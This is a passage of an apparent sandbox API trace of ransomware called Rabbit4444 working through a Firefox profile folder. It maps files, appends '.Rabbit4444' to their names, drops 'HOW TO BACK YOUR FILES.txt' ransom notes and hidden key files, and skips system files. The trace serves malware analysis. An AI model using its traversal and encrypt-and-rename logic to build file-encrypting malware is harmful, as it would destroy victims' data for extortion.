hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0052.178] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0052.178] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0052.178] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14348901226) returned 1 [0052.178] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0052.178] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101f30 | out: hHeap=0xe0000) returned 1 [0052.178] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.178] CloseHandle (hObject=0x298) returned 1 [0052.178] CloseHandle (hObject=0x278) returned 1 [0052.179] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\state.json.Rabbit4444") returned 109 [0052.179] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\state.json" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\datareporting\\state.json"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\state.json.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\datareporting\\state.json.rabbit4444"), dwFlags=0x1) returned 1 [0052.179] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x145d99f2, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x145d99f2, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x145d99f2, ftLastWriteTime.dwHighDateTime=0x1d327ca, nFileSizeHigh=0x0, nFileSizeLow=0x33, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="state.json", cAlternateFileName="STATE~1.JSO")) returned 0 [0052.179] FindClose (in: hFindFile=0x102950 | out: hFindFile=0x102950) returned 1 [0052.179] lstrcpyW (in: lpString1=0x130ebe8, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.179] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\datareporting\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0052.179] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0052.180] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0052.180] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.180] CloseHandle (hObject=0x278) returned 1 [0052.180] CloseHandle (hObject=0x27c) returned 1 [0052.180] GetCurrentThreadId () returned 0xd98 [0052.180] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xea710 [0052.180] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived" [0052.180] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x116380 | out: hHeap=0xe0000) returned 1 [0052.180] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xea708 | out: hHeap=0xe0000) returned 1 [0052.180] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived" [0052.180] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\" [0052.180] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\.BFC0E91B00AE8A0620D3" [0052.180] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\datareporting\\archived\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0052.182] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0052.184] FlushFileBuffers (hFile=0x27c) returned 1 [0052.185] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.185] CloseHandle (hObject=0x27c) returned 1 [0052.186] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived") returned 96 [0052.186] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.186] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x147168f2, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x14717c78, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0xe86c9b12, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0052.186] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.186] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.186] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0052.186] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.186] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x147168f2, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x14717c78, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0xe86c9b12, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.186] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.186] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.186] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0052.186] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.186] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.186] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe86c9b12, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe86c9b12, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe86c9b12, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.186] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.186] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.186] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14717c78, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0xb8403501, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xb8403501, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2017-09", cAlternateFileName="")) returned 1 [0052.186] lstrcmpiW (lpString1="2017-09", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.186] lstrcmpiW (lpString1="2017-09", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.187] lstrcmpiW (lpString1="2017-09", lpString2="Rabbit4444.exe") returned -1 [0052.187] lstrcmpiW (lpString1="2017-09", lpString2=".") returned 1 [0052.187] lstrcmpiW (lpString1="2017-09", lpString2="..") returned 1 [0052.187] lstrcmpiW (lpString1="2017-09", lpString2="windows") returned -1 [0052.187] lstrcmpiW (lpString1="2017-09", lpString2="bootmgr") returned -1 [0052.187] lstrcmpiW (lpString1="2017-09", lpString2="pagefile.sys") returned -1 [0052.187] lstrcmpiW (lpString1="2017-09", lpString2="boot") returned -1 [0052.187] lstrcmpiW (lpString1="2017-09", lpString2="ids.txt") returned -1 [0052.187] lstrcmpiW (lpString1="2017-09", lpString2="NTUSER.DAT") returned -1 [0052.187] lstrcpyW (in: lpString1=0x130ebfa, lpString2="2017-09" | out: lpString1="2017-09") returned="2017-09" [0052.187] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6588 [0052.187] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xd2) returned 0xef950 [0052.187] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6590 | out: ListHead=0xf68b0, ListEntry=0xf6590) returned 0xf6550 [0052.187] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14717c78, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0xb8403501, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xb8403501, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2017-09", cAlternateFileName="")) returned 0 [0052.187] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0052.187] lstrcpyW (in: lpString1=0x130ebfa, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.187] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\datareporting\\archived\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0052.187] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0052.187] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0052.188] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.188] CloseHandle (hObject=0x278) returned 1 [0052.188] CloseHandle (hObject=0x27c) returned 1 [0052.188] GetCurrentThreadId () returned 0xd98 [0052.188] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6590 [0052.188] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09" [0052.188] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xef950 | out: hHeap=0xe0000) returned 1 [0052.188] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6588 | out: hHeap=0xe0000) returned 1 [0052.188] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09" [0052.188] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\" [0052.188] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\.BFC0E91B00AE8A0620D3" [0052.188] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0052.191] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0052.194] FlushFileBuffers (hFile=0x27c) returned 1 [0052.195] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.195] CloseHandle (hObject=0x27c) returned 1 [0052.196] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09") returned 104 [0052.196] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.196] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14717c78, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0xb8403501, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xe86efdc3, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102850 [0052.196] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.196] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.196] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0052.196] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.196] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14717c78, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0xb8403501, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xe86efdc3, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.196] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.196] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.196] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0052.196] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.196] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.196] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe86efdc3, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe86efdc3, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe86efdc3, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.196] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.196] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.196] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14723fca, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x14723fca, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x14728de9, ftLastWriteTime.dwHighDateTime=0x1d327ca, nFileSizeHigh=0x0, nFileSizeLow=0xbdc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1504782700362.8d7a0e36-bec8-411d-a84e-102fe642b34c.new-profile.jsonlz4", cAlternateFileName="150478~1.JSO")) returned 1 [0052.196] lstrcmpiW (lpString1="1504782700362.8d7a0e36-bec8-411d-a84e-102fe642b34c.new-profile.jsonlz4", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.196] lstrcmpiW (lpString1="1504782700362.8d7a0e36-bec8-411d-a84e-102fe642b34c.new-profile.jsonlz4", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.196] lstrcmpiW (lpString1="1504782700362.8d7a0e36-bec8-411d-a84e-102fe642b34c.new-profile.jsonlz4", lpString2="Rabbit4444.exe") returned -1 [0052.196] lstrcmpiW (lpString1="1504782700362.8d7a0e36-bec8-411d-a84e-102fe642b34c.new-profile.jsonlz4", lpString2=".") returned 1 [0052.196] lstrcmpiW (lpString1="1504782700362.8d7a0e36-bec8-411d-a84e-102fe642b34c.new-profile.jsonlz4", lpString2="..") returned 1 [0052.196] lstrcmpiW (lpString1="1504782700362.8d7a0e36-bec8-411d-a84e-102fe642b34c.new-profile.jsonlz4", lpString2="windows") returned -1 [0052.196] lstrcmpiW (lpString1="1504782700362.8d7a0e36-bec8-411d-a84e-102fe642b34c.new-profile.jsonlz4", lpString2="bootmgr") returned -1 [0052.196] lstrcmpiW (lpString1="1504782700362.8d7a0e36-bec8-411d-a84e-102fe642b34c.new-profile.jsonlz4", lpString2="pagefile.sys") returned -1 [0052.196] lstrcmpiW (lpString1="1504782700362.8d7a0e36-bec8-411d-a84e-102fe642b34c.new-profile.jsonlz4", lpString2="boot") returned -1 [0052.197] lstrcmpiW (lpString1="1504782700362.8d7a0e36-bec8-411d-a84e-102fe642b34c.new-profile.jsonlz4", lpString2="ids.txt") returned -1 [0052.197] lstrcmpiW (lpString1="1504782700362.8d7a0e36-bec8-411d-a84e-102fe642b34c.new-profile.jsonlz4", lpString2="NTUSER.DAT") returned -1 [0052.197] lstrcpyW (in: lpString1=0x130ec0a, lpString2="1504782700362.8d7a0e36-bec8-411d-a84e-102fe642b34c.new-profile.jsonlz4" | out: lpString1="1504782700362.8d7a0e36-bec8-411d-a84e-102fe642b34c.new-profile.jsonlz4") returned="1504782700362.8d7a0e36-bec8-411d-a84e-102fe642b34c.new-profile.jsonlz4" [0052.197] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504782700362.8d7a0e36-bec8-411d-a84e-102fe642b34c.new-profile.jsonlz4", dwFileAttributes=0x0) returned 1 [0052.197] lstrlenW (lpString="1504782700362.8d7a0e36-bec8-411d-a84e-102fe642b34c.new-profile.jsonlz4") returned 70 [0052.197] lstrlenW (lpString="Rabbit4444") returned 10 [0052.197] lstrcmpiW (lpString1="le.jsonlz4", lpString2="Rabbit4444") returned -1 [0052.197] lstrlenW (lpString=".dll") returned 4 [0052.197] lstrcmpiW (lpString1="nlz4", lpString2=".dll") returned 1 [0052.197] lstrlenW (lpString=".lnk") returned 4 [0052.197] lstrcmpiW (lpString1="nlz4", lpString2=".lnk") returned 1 [0052.198] lstrlenW (lpString=".ini") returned 4 [0052.198] lstrcmpiW (lpString1="nlz4", lpString2=".ini") returned 1 [0052.198] lstrlenW (lpString=".sys") returned 4 [0052.198] lstrcmpiW (lpString1="nlz4", lpString2=".sys") returned 1 [0052.198] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504782700362.8d7a0e36-bec8-411d-a84e-102fe642b34c.new-profile.jsonlz4" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504782700362.8d7a0e36-bec8-411d-a84e-102fe642b34c.new-profile.jsonlz4"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0052.198] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0052.198] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14350858114) returned 1 [0052.198] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=3036) returned 1 [0052.198] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0052.198] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1020c8 [0052.198] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xee0, lpName=0x0) returned 0x298 [0052.199] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xee0) returned 0x70000 [0052.200] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0052.200] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0052.200] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0052.200] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0052.200] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0052.200] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0052.200] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0052.200] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0052.200] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14351092234) returned 1 [0052.200] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0052.200] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1020c8 | out: hHeap=0xe0000) returned 1 [0052.200] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.200] CloseHandle (hObject=0x298) returned 1 [0052.200] CloseHandle (hObject=0x278) returned 1 [0052.200] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504782700362.8d7a0e36-bec8-411d-a84e-102fe642b34c.new-profile.jsonlz4.Rabbit4444") returned 186 [0052.201] MoveFileExW 